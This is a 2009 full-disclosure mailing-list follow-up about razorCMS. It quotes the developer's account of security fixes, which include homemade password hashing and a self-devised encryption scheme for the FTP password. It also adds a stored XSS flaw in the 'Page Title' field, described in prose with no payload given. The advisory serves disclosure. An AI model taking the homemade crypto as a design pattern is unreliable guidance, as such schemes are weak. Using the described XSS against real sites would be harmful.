Date: Thu, 16 Apr 2009 11:26:32 -0700
From: "Jeremi Gosney" <epixoip@...h.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [follow-up] razorCMS - Multiple Vulnerabilities

The following was received this morning from the author of
razorCMS. It seems the threat of full disclosure really expedites
vulnerability remediation ;)

"All XSS attacks are now plugged, this has been solved. The admin
password now uses my own password hashing method that introduces
salt in at a position that is relative to the input password
length, the salt is then appended to the front of the password. ftp
password is now encrypted again using my own algorithum and is only
decrypted using a key stored in session. this way to get ftp
password they have to look at file to get ftp password then hijack
the session that is randomly changing it's session number every
refresh to get the key to unlock it. the whole system now gets
owned by apache, and the security manager has now gone, and been
replaced with security check on main page when loging in, this
checks ALL files and lets you secure ALL files. if any files are
open the big box goes red, so you would have to be blind to miss
it. This will also work for ftp mode too and just checking how much
functionality i can get out of it for windows permissions too.
There is still the option to make all files unsafe, as this can be
invaluble when uninstalling razorCMS, but it is riddled with error
messages and turns the box red, plus it's on the home page so you
will see it every time you login. Login now bans you after X
amounts of tries, for upto 60mins, you can have no more than 8
failied logins in 60mins, if you conceal your IP it will ban you
from logging in. All upto 300 records are stored in a log which
prunes itself to 300 records (all configurable) I have a file
manager to add in the mix too, so theres been a lot of effort here
to tighten things up a hell of a lot. should be about a week or two
then i'll release for testing. It's still got some rough edges."

All razorCMS users are encouraged to upgrade to the latest stable
version (0.4) once its released in "about a week or two."

One thing I accidentally left out of the disclosure below:

*  A permanent XSS vulnerability has been discovered in the "Page
Title" field of the "Create New Page" form, making it vulnerable to
permanent XSS viruses. Any script tags appended to the page title
will be executed on every page view and executed three times every
time the Content Manager is accessed in the admin section.

This presumably has been fixed for the new release per the author's
statement above.